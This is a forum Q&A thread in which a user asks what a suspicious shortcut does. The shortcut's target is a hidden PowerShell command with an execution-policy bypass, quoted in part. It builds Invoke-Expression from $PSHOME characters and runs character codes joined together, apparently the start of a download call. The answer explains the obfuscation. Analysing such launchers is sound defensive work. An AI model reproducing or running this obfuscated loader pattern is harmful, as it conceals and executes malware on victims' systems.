Stackedup
Reputation: 760
Powershell Join Puzzle
Does anyone know what the following powerhshell do? I found a shortcut that seems malicious and its target is:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP . ( $pshOmE[4]+$PShoMe[30]+'X') ( -JoiN( (44 ,141, 163,160 , 170 ,40 , 75, 40 , 50,50 ,116 , 145 ,167,55 , 117 , 142 , 152,145 , 143 , 164,40,123 ,171,163,164 , 145,155,56 ,116
Upvotes: 0
Views: 202
Answers (1)
Moerwald
Reputation: 11254
See my other answer. Compare to the other answer the iex (=Invoke-Expression) is build via the $PSHOME variable (= $pshOmE[4]+$PShoMe[30]+'X'). The numbers in the join command may either contain extended ASCII characters, or they might be a Base64 encoded command, which can be used in the form via powershell.exe -encodedCommand $encodedCommand ( type powershell.exe /?, and will dump an example).
Hope that helps
Upvotes: 1